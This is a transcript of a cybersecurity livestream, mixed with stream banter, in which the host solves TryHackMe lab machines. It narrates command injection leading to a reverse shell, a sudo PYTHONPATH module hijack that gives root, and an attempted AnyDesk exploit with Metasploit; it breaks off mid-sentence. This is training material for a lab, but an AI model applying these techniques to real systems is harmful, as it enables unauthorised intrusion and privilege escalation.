Hello, welcome to Cyber Mentoring Monday. Hopefully you can hear me okay, and I forgot to turn off a filter on my webcam. I was messing around with the green screen. It's not working very well, but we'll fix it. That's better. At least my neck isn't going crazy. How's the mic, by the way? Is it slightly loud? I feel like it is. Let me see. Is that better? No. What about that? Yeah, let me know about the volume. I was playing around with the voice mod. It usually doesn't go up into the red. That's why I'm a bit concerned. Okay. All right, we'll see how it goes. Cool. How is everyone's weekend? Hopefully good. Yeah, so I figured out, for those of you who are stream regulars, I've installed voice mods so that we can adjust the pitch of my voice whenever it lands on the certain one on the wheel. So, a busy weekend. Yeah, I know the feeling. Mine was pretty busy as well. All right. Let's get to it at least. Okay, where's the wheel? Now I just need to make sure. Okay, my Stream Deck is not working. I just need to make sure this isn't gonna. It sounds okay to me. The Stream Deck keeps not finding Firefox. Okay. All right, we gotta redeem the Rubik's Cube. We'll do that in a sec. So, few things. If you were on my Friday stream, you will know that we hit the 2 times next spin twice in a row, which meant 4 times, and then we hit the 1 gift sub to chat, which meant I had to buy 4 gift subs for chat, which means I've got 4 spins to start the stream off, which is, you know, pretty good. Also, I'm going to paste this in chat. This is a survey for a game I am hopefully going to be running at DEF CON. It's called Feet Feud. For those of you who don't know, I'm a member of a CTF team / hacking collective known as Only Feet, led by Footpicks for Sale. If you haven't checked out her streams, I think it's at X Footpicks for Sale X, I think. Pretty sure that's her. Yeah. Which, if you weren't aware, that is a complete, like, joke. She works in cybersecurity. She does not sell pictures of her feet. I think that's her right. Oh no, it's not the right one. Okay, hang on. Is it just? I think that's her Twitter. Is it just Footpicks for Sale? It is. All right. I'll do another shout out. There we go. I think her Twitter has the X's in it. Anyway. So we're doing back in, I want to say February or March, they did a conference, their own little conference thing. And it was, I forget where it was, but anyway, I created Feet Feud, which went down very well. Pretty much, I just had, I think it was 11 categories, and I asked Twitter and my Discord to just fill it out, And that's why I'm asking you guys, just fill it out. If you're not going to play, I mean, if you're not in OnlyFeet or you don't know what OnlyFeet is, you're probably not going to play anyway. So click the link. I'll paste it again. Hang on. There's 10 questions. Just answer them with the first thing that comes to your head that's, you know, try to be correct about them. If you don't know, you can just skip it. But anyway, it's basically Family Feud with cybersecurity questions and a slight feet theme. So I'm not sure if I'll be streaming it. I'm not sure if I'll be able to be streaming it just because I'll only have my laptop and I'll need to have the game running on my laptop, probably connected to a screen. It's going to be a whole thing. But if it's not recorded, I'm sure if you're there, I'm sure I'll announce it and where we're potentially doing it, and you can come be in the audience, I guess. Yeah, so if you could do that, would be great. I also, for this stream, have a 1-month TryHackMe subscription to give away thanks to Gar. I will give him a shout out, Gar7. He is apparently streaming right now. But anyway, he gave me one. I'm going to pay it forward. So we'll do that at some point. But let's get these spins out of the way. So for those of you who don't know what's happening, every time somebody subscribes, they get a spin. Start off with a marble race. Amazing. So there's a bunch of things on here. Some of them are good for chat. Some of them are good for me. Some of them are terrible for me. Usually those are the ones that are good for chat. Some of them are, you know, good for everybody. I really don't like how the mic keeps going into the red. But alright. Alright, so we start off with the marble race. We'll do that in a minute. 3 more spins. Get 2 times the next spin. Alright. See what we get. Oh, there we go. So I got to raise or lower my voice pitch for 10 minutes. It's 2 times. Okay, so we'll do a quick poll. Raise or lower? Alright. We'll do a minute. I will raise it by, I guess, 10% on this. It's set to 50 right now. So I'll either raise or lower it to 50 for 10 minutes. All right, let's do the last spin. And then hack without glasses. Okay. So we will do that. We'll do that at some point. After we've, because I don't want to take my glasses off now and not be hacking. So, yeah. Okay. So we'll get the marble race going. Oh, we should probably do Stream Raiders as well. So if those of you who don't know what Stream Raiders is, there is a link that has appeared in chat. Effectively, if you click that link and sign in with your Twitch account, every 5 minutes you'll hear a little chime. Keep the window open in your tab, basically. It means you can go put another unit on the battlefield, and after half an hour, we have a little battle. All you have to do is place the units, and that's it. Okay, everybody wants me to raise the pitch of my voice. Now, I won't be able to hear this, but let's try it. Okay, hang on.
This is really not good. Okay, I think it's raised. I guess I can't go. Oh my god. Is it raised good? I keep trying to put 60 in, it just won't accept 60. Oh, jeez. Alright. Okay, there it is at 60. That's the worst interface ever. Alright. So I guess I should start a timer. For 10 minutes. I can't hear it, so I'm gonna have to watch the VOD back. Okay, marble race. Sure, we'll do this one. Alright, and again, for those of you new to the stream, Marbles is a fun game that we play. You type !play in chat if you want to play. That's all you need to do. It's a physics and RNG based game. So you've really got no excuse. There's 5 characters. I mean, and if you really think about it, it's only 6 button presses if you have the shift for the exclamation point. So I want to see as many people in there. We're going to give you 60 seconds to join. You can even join on mobile. Yeah, exactly. In some game modes, you can type boost for a boost, but in this game mode, you cannot. And also, it's incredibly delayed, so it doesn't really help. Exclamation point play in chat. You still have 40 seconds-ish. And then we will get to the hacking. What do you type? Exclamation point play. Very funny, Kidfire. I see you typing it already. I feel like I gotta say it multiple times just to get everybody on board. You know? There's only 17 people who have typed it, and there's 58 people viewing me right now, according to, you know, my little stat thing. So, some of you just aren't typing it. Alright, we've got 17 people. Alright, that'll be fine. So this one is called Coils of Power, and I don't know exactly what these Coils of Power do, but I guess we're gonna find out. Okay. I mean, I could, like, follow you guys down, but I feel like I'm just gonna go up here and down. There we go. Ticker is out. Got a pretty good lead. Oh, no! I don't know. That's bad. Alright. Ticker did not survive. Rosicat also did not survive. Dark Eldar did get hit, but it looks like it's okay. I don't know really who's in first place. Because the problem with this game is it calculates first place. Oh, okay, Dark Eldar's just dead. Calculates first place depending on how far from the goal you are, and obviously if you're going around a coil thing, then first place is changing all the time. So, I can't really tell. Looks like I'm kind of in first place, but Shields Up might have me. Here we go, let's see who comes out first, I guess. Particle to Geo I think is fallen. Yep. Alright, oh, Kitfar Redacted also. Is anybody gonna finish? We only have 9 people left. 8 people left. Okay, here I come, but I got hit by some kind of power-up, I guess. Highcat and Bozo 1 DOS is looking good right now. Maticus Maximus, that isn't actually Maticus Maximus, that is the stream record. So if you want the stream record, you have to beat him. Which is still doable. Highcat could definitely do it here. Alright, we're gonna... how'd I get caught in this thing? Alright, we're gonna go over here. And we're just gonna check who comes out first. So Malicus's ghost is still in the lead. Highcat looks like in second place. I'm not entirely sure you're gonna make it. There's only 4 of us left. Demon is all the way up there. But yeah, I think Highcat, you gave a valiant effort. You did come first, but you didn't beat the record. Bozo 1 DOS comes second, and myself in third. Demon, what are you doing over there? It's just so slow. Now, there is unfortunately a timer. If you see in the top kind of the top left, but to the right of the top left, I guess, there is a timer that's counting down. You've got so Demon only has 1 minute and 5 seconds to finish the track, which I think is doable. That looks pretty doable to me, to be honest with you. So we'll just follow Demon and see if indeed they manage to finish. Unless anything bad happens, it's looking pretty good. Yeah, okay. Well, I really need to listen to this voice back because I have no idea how it sounds. Alright, well done, Highcat. How long have we got left on it? Did I not start the timer? I did start the timer. Okay, 4 minutes, 20 seconds. Alright, we're okay. Alright. Yeah, I figured it out. I could actually turn on Hear Myself on here, but that's probably just gonna sound awful because it'll be duplicated on the stream. So I'm just gonna have to listen to it back at some point. Okay. As long as I'm still understandable, it's fine. Okay, so we need to decide, do we do TryHackMe Proving Grounds, or... I really don't want to risk doing Hack the Box. Hack the Box is not a good thing to do on Cyber Mentoring Mondays. But... which platform? Okay, so we'll do TryHackMe and Proving Grounds. And I can already predict it's probably going to be Proving Grounds, because for some reason, everybody loves Proving Grounds. TryHackMe got a problem on VPN. Really? Let me check their Twitter. Real TryHackMe. Doesn't look like they've tweeted about it. Oh well, if TryHackMe wins, which it's not going to, I'm sure that'll be a problem. I'm gonna log into Breeding Grounds anyway. Yeah, actually I need to sign in using this. So I don't want you guys to see anything. Pretty sure my name isn't in there, but whatever. Alright. We're logged in. Oh, well, TryHackMe is winning now. Look at that. I really want to listen to this. Okay, screw it. This is going to sound really weird on stream, but I'm going to click Hear Myself. Hello. Oh, God. That's awesome. This was a good decision. Alright, I'm glad I managed to fix that. I just really hope it's not too loud. I'm really kind of anal about having everything in Streamlabs set up. And I usually have it so my voice doesn't go into the red area. It pretty much just grazes. There's green, yellow, and red. It grazes the yellow area. Oh wow, you've tied it. Well done. It keeps going into red though, so I don't know. Alright, coin toss. So it's gonna be heads for TryHackMe, tails for Proving Grounds. Oh, well, there we go. It's gonna be TryHackMe then. Nice, because we haven't done TryHackMe on Cyber Mentoring Monday for a while. At least we haven't. I think maybe we did it last week, but it was only the third box. Alright, we're gonna hide completed. We're gonna go to challenges. We're gonna set the difficulty to easy, and we'll go to maybe newest. Okay. This looks like a new one. Let's have a look at this, I guess. I'm gonna join the room just to see how many tasks there are. Oh, is it? Okay, this isn't the real box. It's just to basically look through GitHub. Alright. We're not going to do forensics, reversing, or stego because they are awful. Alright, I can finally set my voice back. Cancel. There we go.
Okay. Alright. Is that my normal voice? I do hope so. Okay. Reversing, fishing. You don't do fishing either. I now sound weird? Are you trolling me? If you're trolling me, you have to say. Oh, really? Oh, okay, good. Alright. Reversing. Oh, so much reverse engineering. GIF around. Oh, someone redeemed a, Someone redeemed Solve a Rubik's Cube. So maybe we should do that first. Well, actually, I'll tell you what we'll do. We'll have a poll. We'll choose a few boxes. It looks like there's this CVE. So we'll select this one, I guess, for the poll. Mysteries83, thank you for following, as well as XAIC12 and Anthony, and also WickZ32. Alright, so we've got this one. Let's see if there are any others. I'm good, my friend. Thank you so much for joining. Thank you for following. So much OSINT. I really wish people would stop doing this. JPGChat is one that I've been interested in doing for a while. It keeps going in the polls, but nobody keeps picking it. Magician as well. So we'll do those three potentially. All right. Which room? And then we'll do a Rubik's Cube solve. So we've got the WordPress room, JPGChat, and Magician. I believe these are all based on CVEs as well. Okay, so here's how we're going to do this. Going to go to my webcam. All right, so I'm going to look away and scramble this as best I can. I'm just trying to randomize it. I don't really remember what I'm doing. All right, I think everyone can see that's pretty scrambled. Like, even the colors that match don't have the right corners. All right. Well, 69% more scrambling. Yeah, okay. All right. What are we doing here? All right, let's solve this thing. Did everyone see it okay? Maybe I should move it here. All right. So we've solved the bottom. Now we just need to solve the second layer. Looking good. And then this one goes that way. So now we've solved two layers. Let's solve the top. Okay. Alright. Now I just need to fix the corners. And solve in a few moves. There we go. Alright. JPGChat is currently winning. Good, good, good. The technique I use is basically you solve you do the cross at the bottom, then you solve the bottom corners, then you solve the middle, and then the top. How long did it take you? Honestly, probably only a few months of just every day just doing it. The only thing you need is I think there's like roughly about 10 algorithms you need to just memorize. Once you've actually memorized them and done them enough, you don't even remember the steps. It's all muscle memory. Okay, JPG chat 1. But honestly, once you've memorized them enough that you're not just forgetting them and you can do them, then really it's just speeding up how fast you do them. It's speeding up how fast you can notice the cube arrangement, and then because obviously the algorithm you use depends on what the cube looks like. There's different algorithms depending on what the actual configuration is. So really, at that point, if you don't want to, if all you want to do is solve it relatively fast, which is basically what I want to do, that's all you need. However, if you really want to speed solve it, there's a bunch more algorithms you need to know, because the way I do it is pretty slow in terms of speed solving. Like there's people who could. I think the current record is 3 seconds and something. Yes, you see. Rubik's Cube world record. Yeah, 3.47 seconds. And the reason you can do it this fast is I forget how many seconds you get to look at it. So basically, how it happens, they have a mat, which is touch sensitive. The cube is on the mat. You pick up the cube, you look around it, you memorize the pattern. And while you're memorizing it, you're figuring out in your head, okay, these are the moves I need to make. You then place the cube down, you touch your 2 hands, and then as soon as your hands release, the timer starts and you can pick up the cube and solve it. So that's how speed solving works, at least. But honestly, I don't think it's ever going to be sub 3. I'm pretty sure we're close to the limit just because of the number of moves. Did I join the room or did I? Alright. Start machine. Okay, so we solved a Rubik's Cube. Okay, Gifaram wanted me to say needs 69% more scrambling.
Nice.
Alright. Yeah, like the Lego stuff. I've honestly that's one of the projects I've wanted to do with the Lego robot. I have a Mindstorm robot that I need to do some more stuff with. Honestly, it's definitely a lot of fun. Oh, we got 69 viewers as well. That's even
Nice.
more. All right, so we should probably put JPGChat into our DNS. So I'm going to CD into. Let's actually see if this Open VPN thing works, because apparently they've been having issues. Looks like it worked though, so we're good. All right, I need to vim the DNS mask. And what we're going to do is we're going to say, okay, so this is DNS mask, which is much better than Etsy hosts. I didn't want to open 2 of them, sorry. So the way this works is you can define servers there. So these are the general servers. Basically, they'll default to that. You can even define servers. So if any of the domains end in .labs, it'll use this DNS server. This is for the eLearn security web app stuff. But here, if you use the address, you can do .jpgchat.tryhackme and then paste the address. What this does is it will resolve jpgchat.thm to this, but also any subdomain automatically. The only thing you have to do is do a service reload, I think. Oops. Yeah, restart. And then hopefully, if we do jpgchat.tryhackme, yeah, there you go. So the reason this is better than Etsy hosts is if we discover subdomains, we would have to add them to Etsy hosts. But now we don't. Now, if I do test.jpgchat, it resolves as well. It just saves us a bunch of time. All right, so we're going to make JPGChat, and we're going to use auto recon, obviously. And I can put in jpgchat.tryhackme and run that. Auto recon is a tool I wrote, and I'll put the link in chat. It's an automated enumeration tool. It's looking like it only found port 22 and 3000, which is odd. Do I need to wait for this box? No. I wonder if there is a... We'll wait for the full TCP port scan to finish. But effectively what it does, it runs a few port scans, top CCP ports, all TCP ports. It can also run the UDP, but I obviously didn't run it as sudo, so it won't. It identifies the services, like SSH, for instance, discovered, obviously. And then it starts scanning. So it has, I think, one thing for SSH, which is just a better Nmap scan for SSH. But we are still scanning all the TCP ports, so possibly something else will happen. We might as well create a new page here for JPGChat. Is it JPGChat or just JPEGChat? I don't know. I'm going to add it. No, we're going to expand it, sorry. And for width, this is just Notion enhanced for Linux. It's basically a GUI for Notion. So I'm going to paste the IP address in here, just so we have a little reference to it. And we'll just track all our findings in here. Alright, so I didn't find anything other than PPP, I guess. Which is interesting. So there's literally no... Come on. Oh, I should probably... There really is no web server. Interesting. Okay. So PPP on port 3000. Let's have a look. Okay. I have heard of it before. Yeah, point-to-point protocol. Okay. So it is a... What protocol is it? Point-to-point protocol. Right. That's weird. This is supposed to be an easy box. Might rescan the freaking thing. Because I can't believe it's just those two ports, unless there's a really bad SSH vulnerability. That is the right IP address, right? 242.13. Let's just do host JPGChat. 10.10.242.13. Yeah, that's right. Interesting. I mean, let's just connect to it using NC, I guess, and see what happens. Okay. So it's not, in fact, PPP, even though it was identified as PPP. This is why, by the way, if we go to Auto Recon, you have this disclaimer. There is no guarantee that every service will be identified, okay? Do not rely on this tool alone for exam, CTF, or other engagements. This is exactly why. Gus7, my friend, reigning with 47 viewers. How was your stream? I'm sorry I missed it, but I believe you were just reading reports, right? Everyone, by the way, thank Gar for the gift sub that we're going to give out later. You just downed a spoonful of hot sauce. Well, I had to raise the pitch of my voice using voice mod because the spinner landed on it. So you missed 10 minutes of that. I'm sure I'll have to rewatch it. But yeah. So we're doing JPGChat. Or JPCChat. Wait, what? Did I... It's called JPGChat here. And this is called JPChat. What is this box? The source code of this service can be found on our admin's GitHub. Okay. So I guess JPChat GitHub. Let's see. Service created for the room. Okay, this is the right one, but I don't know why they call it JP and J. The G may be important. All right, there's a Python chat. It's Python 3. And it echoes system commands. Okay. This might be fun. So we need to, I guess, just do a report, because that will trigger report form. And then we just basically need to, we're just injecting into this. So I imagine what we can do, we go into here. So our injection point is here. So I'm guessing we could probably just do something like, well, we should probably give it something to echo. And then maybe sleep 5. And then a hash just to comment out all of this crap. Yeah, let's try that. So we need to do report in square brackets. Okay. So I should probably I tell you what I should do. I should just do test and test. Okay, right. So that's what happens if we do test and test. There we go. All right. So now if we do test and that. That looks promising. All right, so you see that? You see how this one exited immediately? But this one waited 5 seconds? I wonder why. All right, so now we can just do a reverse shell. So we can do rev shell gen. Let's use the bash one, because we know we can execute bash on this box. So we're going to do this. Let's make sure that's the right IP address. It is indeed. All right, so let's get a shell, and then we'll do stream readers. So I need to create another one here and connect. So here, basically, instead of this, I'm going to do this, and then we need to copy all of this. And this should hopefully give us a nice shell. Give me shell. That did not give me a shell. Interesting. Alright, let's do stream raiders, then we'll debug. I'm sure there's a perfectly valid reason. Okay, well done. Particle to do random Wisman, and ascertainment. Let's keep going. There we go. I don't think it is the wrong IP address. Because my IP address is displayed down here. And if I do IPA, yep, that is my IP address right there. So that should be fine. What we can try is obviously this used a bunch of these. Maybe what we should do is in fact just do bash-c and then surround this by quotes as well. So we can try that. Alright, so we'll keep that open and we'll connect back. Report. Rev shell. There we go. So it's probably just these characters messing up. These are specific to bash, and actually I probably should have realized, yeah, this isn't actually executing in a bash shell. Where is it? This is just executing on the operating system, right? So you can't generally put bash or shell specific things in that. So this is why they're running it in bash. So you can run bash and then we're passing a command to bash here, but you can't just do it generally. So that's why I just had to do that. Pretty easy. All right. So we are in.
We are in.
I should probably keep this open because I imagine when I hit Control C, it just cancels everything. Do we have? Well, we know we have Python 3 because this is a Python 3 app. So what we're going to do is we're going to do Python 3 -c import pty.spawn bin bash. And the reason we do this is so we can stabilize our shell. And then we're going to do Control Z, that backgrounds it. We're going to do stty size. This gets the size of my current shell. And then we're going to do
new subscription received.
We do
Dispensing
stty
gratitude dispensed.
Demas4202. Thank you so much for the Prime sub. We'll do your spin in a sec. So you do stty raw-echo and then semicolon and then foreground. So what this does is this means anything we type into our shell will not get echoed back to us. And this is important because as you can see, when I typed which Python 3, it spat out which Python 3. Okay? And the reason it does that is because by default, when you type something in, right, to a shell, on a reverse shell, it's going to show up the other side, right? And so because it shows up the other side, our reverse shell thinks it's output when it's not. It's actually our input that just got reflected back. So if we do that, hit enter. Now when we type stuff, it won't get reflected back. But one thing we do need to do is do stty cols, and we're going to use the columns 153, rows 39. Okay, and then we're going to do export term equals xterm 256 color. And now we have a fully stable shell. I can cancel, and you notice when I did type those commands, nothing got echoed back, right? It was just this. Okay. All right, let's do a spin for Demas 4202. See what you get. Remove a category. That's a boring one. Let's do another spin. We get that one way too often. I might have to reduce the the prevalence of it. Twitch VIP, there you go. All right, Demas 4202. Welcome to the VIP club. Let's actually do remove a category. Where's remove a category? Let's put this down to 5. There we go. And we'll save it. Okay. Done that. Oh, I should be hacking without glasses, so I forgot about that. So earlier in the stream, we span and got hacked without glasses for 5 minutes, so I will remove my glasses and we'll set another timer. Okay. For 5 minutes, and we'll do the privilege escalation, hopefully, with a very blurry screen in front of me. I am close-sighted, but to read this, I have to... Yeah, there we go. I can read it at that point. It's very blurry right now, but let's try... We are the Wes user. Are there any other users on this box? Let's see. Yes, we got Vagrant. So can we go into home? Interesting. So it's see here, it says that Vagrant has a home directory, but it doesn't look like they do. Dash LA. Oops, tell us. Dash LA would help. Yeah, there's no actual home directory for Vagrant. Interesting. All right, what do we have here? So there is a bash history file, but it's zeroed out, which is useful. We can cat the user.txt because it's readable. So at least we grab this. Oops. And report this. Okay. I guess we'll just do sudo -l. Now, obviously, we don't know his password. Okay. We know his password, we don't actually need to know his password, because apparently if we go into /opt/ actually, we're just going to /opt and see what's in there. Okay, development is owned by root, though. Can we write to this file? We can't write to this file. Okay. And we can't write to development. Let's at least at testmodule.py. All right. Let's just run this command. So what I'm thinking is we need to... The problem is it says env keep Python path. But then we can set env. So let me just check something. When we can do sudo set env, that's probably specific. So with setenv, you allow the user to control. If the Python path is a constant, you can use env. Right, because the basic way of doing this is they're importing compare. So if we just write compare.py, and then if we just do import OS, and then just do os.system bin bash -p, that should basically just get us the answer. But I think if we run this right now, right, it doesn't work. But can we do sudo? Actually, what's Python path? Is it Python _ path? I forget. Where's the Python path variable? It is just Python path. Okay. Oops. So I think we can just do Python path equals here, and then maybe this. Yeah, okay, that was it. So, Python path is usually set, or there's a default. I guess I should do that. There we go.
I'm in.
It's basically where Python, ironically, looks for modules, right? The paths it looks for. Now, according to this sudo setup, it keeps. Okay, thank goodness I can see again. Hang on a minute. So this env keep means that by default, when you run this command, it will keep sudo's Python path. Sorry, it'll keep root's Python path, I believe. No, sorry. It'll keep your Python path. That's right. And this setEnv means we can set environments. So effectively what we did was we overrode sudo's Python path by setting it in the command here. Right, if we had write permission to compare, but we probably don't. So yeah, I mean, you can tell we're root because it says we're root, but you know. And there's root.txt. There we go. So, an interesting box, definitely an easy box. Which is good. That's exactly the kind of box we want to see on a Side Mentoring Monday. Okay. Any questions about any of that? If there are, let me know. That's the point of Side Mentoring Monday. I want to see if I cancelled this. Do we lose our shell? We do, yeah. Oh no, hang on. We don't actually lose our shell. It just, obviously, it will destroy the STTY a bit. But there we go. Well, so yeah, the dot. If you think of Python path, this basically means look here, right, for Python modules. It's usually a semicolon, no, sorry, colon separated list of paths. The dot just means this directory, right? Because that's where I'd written compare. If you see, I CD'd, which if you CD nowhere, by default, it goes back to your home directory, which obviously I know is writable. I then created compare.py, and then I said, okay, set Python path to the dot, and that means, hey, look in here for all your Python goodness. And that's why it used compare.py for the compare module. Alright, we can exit out that. That's a good box done. I can probably shut it down. Okay. Oops, newest difficulty easy. Right, yeah, exactly. So a thing to know about Python is you can create your own Python modules by just creating a file in the same directory as your script, right? Like, let me do this. So if I do test.py, import OS, and then just do print, right? If I do, so and then if I do os.py, and we just do print OS, this should, I believe, when we run test.py. No, okay. There is a way of doing that where if you have it in the same directory, I think. I forget. There is definitely a way of doing it where you can get it to basically execute the same file. I can't really remember how though. I thought I did import, didn't I, when I wrote the test file? Oh, actually, maybe can you do? Hang on. Now I'm curious. If I do this. No, because I need it. No, never mind. Never mind. There is definitely a way of doing it. I just honestly cannot remember how. I don't want to waste time doing it. Challenges. What were the two that we had before? Okay, so we've done JPGChat. We've got WordPress and Magician. Let's look for a third. Oh, maybe hide completed would be helpful. Okay. Kiba. That looks interesting. Identify the critical security flaw in the data visualization dashboard. Can you do the Annie box? Is that easy? I believe that's medium, maybe. Yeah. I mean, how medium is it? Has someone seen it be done? Okay. All right, we'll add Annie, but I'm trusting chat. We'll do a poll. So we got a WordPress box. We've got Magician, we've got Kiba, and we've got Annie. All right, you guys get 2 minutes to vote, and we'll see what you choose. Bearing in mind that Annie is apparently an easy medium. Yeah, it does. I just can't remember how to get it to actually execute. Which is ironic because I literally... This is how auto recon works. Like, this auto recon directory here has an init, which makes it a module. So when you go into main, you see from autorecon.config, import config.
New subscription received.
This is just...
Gratitude
Thank you,
dispensed.
Chardron. Thank you for the Prime sub. So when it says from autorecon.config, it means, hey, this autorecon directory, this config file, .py, here it is. So autorecon is extremely modular. So even all the plugins work like that as well. So if we go to the Durbuster plugin, to create a plugin, you have to at least import the plugin type from autorecon.plugins. Then you can do anything else. But that's how it all works. Which is, by the way, a pain in the ass to get working. The code for it, I think, is in here somewhere. For loading the modules, where is it? Register. Maybe not. Maybe it's in main. Oh yeah, import lib. Yeah, this code is the one that loads the plugins and imports them. All this crap. It took just yeah, it's like hours just to figure out that's how to do it. It's not very straightforward. All right, Annie won. So we will join the Annie room. I'm using a VM. If I couldn't stream on Kali, I think this is a Windows machine. I usually work on Macs, but for streaming and for obviously PC gaming and stuff, I use Windows. Okay. That went so close, so fast. We didn't even bother doing all this. I'll write this custom script on port 3000. Where's the link to it? JP. This one. Come on, I want to paste the link. There we go. Executes commands. Oh, I guess command injection, I should say. Injection. And we can just use this to get a reverse shell. Rev shell. It does stuff and things, yeah. Sudo dash L. I think I closed everything, right? Yeah. Sudo dash L. We can run a Python script as root with no password and set Python path. Script used compare module create compare.py in home dir. And it was literally just import os.system bin bash -p, and then it was literally sudo python path equals dot user development forgot file name .py. Pretty sure that was it, right? Something like that. All right. Have we got a IP yet? Do your user recon go for some vulnerability research and exploit this box? Okay. So let's add the IP address. Address. .any.tryhackme. Yeah. Okay. CD into Annie. Auto recon. Annie.tryhackme. Oh. I need to do the DNS mask update. That's the only bad thing about DNS mask is if you do change the config, you need to restart it. Not too difficult though. Okay, so we have port 22, which is obviously SSH. I should probably open the results. We'll probably need the results for this one. So we've got just SSH, which I'm guessing means the web server is going to be pretty hot. Yeah, 7070. I wonder if that's a web server. 7070. It's not, but okay. We shall wait and see what it is, I guess. Okay, there's another one. Might as well look up that as well. Okay. So it hasn't actually, it's only found these ports. The annoying thing about AirMap is it only reports the services when the scan finishes. It'll report ports as soon as it finds them. But then even if it takes like 5 minutes to do service scanning and it figures out port 22 is SSH immediately, it won't report that until the end. Alright, so there's a real server. We're not going to get much information out of this, are we? So 22, the only thing we need to know about 22 is whether it supports passwords, which it does not. Which means we can't just get a password and log in, we need a key. 7070 is real server, which isn't real server VNC. No, okay, what am I thinking of? I'm thinking of real VNC. That's what I'm thinking of. Okay. Relational database management system. Okay, I guess we just do real server exploit. This is too old. Never actually dealt with real server before, so maybe we should I'm just going to connect to it again. If you maybe it's not even real server. You know? Let's try the 36935 Alright. Port 7070. It could be this. Any desk remote support desktop software? It's annoying that we didn't get anything back when we connected to it. Is any desk available in here? So we do. I should do apt. Search names only. Any desk. No. Okay, so we probably do need to install it. The annoying thing is, yeah, we don't even have a. I'm imagining Nmap based this just off the IP address, off the port number, because it probably didn't get anything back. In fact, we can double check that. If we go to the full Nmap scan. Maybe not. Interesting. Oh! Haha! I'm glad we did check, because the SSL scan, it did. Common name, any desk client. Did that say it as well? This didn't, did it? No. Always check your own map scans. Look at that. Any desk client. Which means it is any desk. So exploit. Oh, what am I doing? Search exploit. Yeah. This is why, this is why this scan exists. It's not just for port scanning. It does version scanning. It does default scripts. So it'll extract some useful information. In this case, just the fact that it was any desk. Search exploit. Any desk. I'm guessing it's this one. So what we can do here. So for those of you who don't know, if you copy the 5 number file name, and then you do search exploit -m. And then paste that number, you copy that file immediately into your current directory. So now we can just look at this. Alright, so it looks like we need to set this IP address. Right, so this IP import is what we need to set it to. And it looks like this is the shell it's going to use. So obviously we need to replace this. So first things first. Oops, let's update this to... What's our IP address? Copy that. And it's 7070. And now we need to basically copy this. We're going to keep this shell code exactly the same. I wonder whether we'll notice. What have I missed? Oh well, I'm sure I'll notice it. Alright, so if we run this, and then obviously we need to... Is it Python 2? It's using Python 3. At least it's using print statements, and it's not... I don't know, we'll see. It does look like it's using Python 3, though. Alright, so we need to replace our L host with this. 10.13.2.135. Yep, exactly. It was search exploit -m. The -m is for mirror. And you can get that 5-digit code either from the search exploit output, or if you have it on exploit.db, if you found it using exploit.db. Like, for instance, let's just grab the first one here. It's this thing up here. All right, you got 550.973. Obviously, if your search exploit is updated, it'll pull that, because search exploit is local. Okay, so we got this. So we need to copy this shellcode. Oops, I need to copy the shellcode all the way from yes. And then what we're going to do is we're just going to delete these lines. Okay. Don't know what happened there. Okay. Someone's saying it's Python 2. I think I have got Python 2. I do, I guess. Doesn't look very good. What is happening? I don't know what this is. I'm not even gonna ask. Alright, let's set up a listener. NC-NVLP4444. And then Python 2, and then the 49. Sending payload. Boom. Who am I? It's not working. Interesting. Yeah, it's a shell reverse TCP. Yeah, I put... No, this is my local port. So this is the one it should connect. I mean, it worked. We got a connection back. It just immediately died, it looks like. Okay. Let's just try it again and see. Okay. ID, maybe? No. I mean, I don't understand why people are talking about the ports. We're literally getting a connection back. There's nothing wrong with the ports. It wouldn't connect back if there was something wrong with the port. It's connecting. It's just not giving me a shell. I wonder if we could just use an x86, maybe? Can we even do x86? You put the script on 7070? Oh, what? Hang on, where did that go? How was I getting a connection? This should... That's... I don't quite understand what happened. You put on the script 7070, not 4444. I mean, this is the IP address of the server. This is where it's supposed to go, look. Send to, IP port. I don't understand how it was even working when it had 50,000 in there. Let's... Now it doesn't seem to work at all. Well, Is this the same script? 4831. Yeah, looks like it. Well, the problem is that port wasn't open. The only port that was open was 36935. Which I guess we could just try. Very strange. Let's map the thing again. So let's do port 50,001 on Annie.TryHack. No, it's closed. So how did this even work? I just want to double check that again, because that's bizarre. Okay, now it's not even working. Oh no, it is. Oh, is it a port knocking attack? Oh, that makes more sense, but I don't... But I still don't understand why this isn't... Oh! You're right. UDP, Highcat. This is not a TCP port. So we should have done a UDP scan. Points go to Highcat for noticing that, unless somebody else pointed it out beforehand. Alright, SU. We'll do top ports 20 -SV any yeah, any.TryHackMe. Alright, well done. No, listener doesn't need to be, because if you think about it, all the reverse shell is application that runs on the target machine and connects back. All right, just because you send it over UDP doesn't mean the connection has to come back over UDP. You can do anything. Alright, so this is the reason I did top ports 20. Because UDP takes forever. But I guess we already know that 50,001 works. Maybe this won't be in the top ports, actually, to be honest with you. That's a good point. Top 20 ports probably doesn't include 50,001. Let's just do port 50,001. And see what happens. And at the same time, we'll use this x86 because maybe the box is x86 and this will work better. I don't know. This is confusing. Why did that happen? Oh. No. Undo. Go away. Copy this. Okay, I don't know why it's doing that, but it doesn't really matter. Alright, we'll open up a new shell and we'll do this again, and then we'll just run it. You didn't like that. Well, the other thing we can do actually is let's use a an x64 shell / reverse TCP. Does anyone know the difference? I'm going to have to open up my NSF console. Yes, exactly. If this is an underscore, this means the shell is stageless, which means all the shell code contains the shell code contains all the instructions for creating a reverse shell. If there's a / here, it means it's staged, which means this shell code all it does is effectively connect back to your Metasploit listener. It has to be a Metasploit. And then it will then the Metasploit will send the rest of the payload. So it's the second stage. No, that shouldn't work because, well, firstly because if you look at the code, where are we? That's literally what it told me to do here. But also, this is a Python script. And so this should be fine. And there aren't any complaints about it. And also, we are getting and again, I say, we're getting a reverse shell. So it should be fine. You know, we're getting a connection back. Just because it's not a good connection doesn't mean it's not working in some way. Multi-handler is what we want to use. We want to set the payload to whatever we told it the payload was here. That's very important. So we're going to set payload to this. This is so that multi-handler knows when it gets a connection back, hey, I need to send the other half of this, the second stage. Otherwise, nothing's going to happen. And if we set lhost to 10.13.2.135, the L port is that. We can just run this now. Failed? It probably failed because I had... No. It shouldn't have failed. But maybe... Oh! I did 13. Yes, yes, yes. That's better. Okay. So now if we run it... Hopefully... That didn't happen. This is just taking way too long. Ah, come on. This is so weird. Stream rages? Did I miss it already? Oh my goodness, yeah. True. Thank you for the reminder. Always good for chat to remind me of these things. So, this is a weird one. I don't really understand why. The exploit has a blog? Okay. Yeah, I guess what we should do, what I will do is just look up. Why didn't I click start battle? I thought I did. I apologize. Multi-handler is the same. IP port, etc. So it doesn't need no. Multi-handler is used to catch shells, so all the IPs it needs to know about are your local ones, i.e. the one the one I have as a VPN. So that's my IP address. Let's go to exploit DB. You're not missing anything. I'm just literally loading the plugin, not plugin, the exploit in 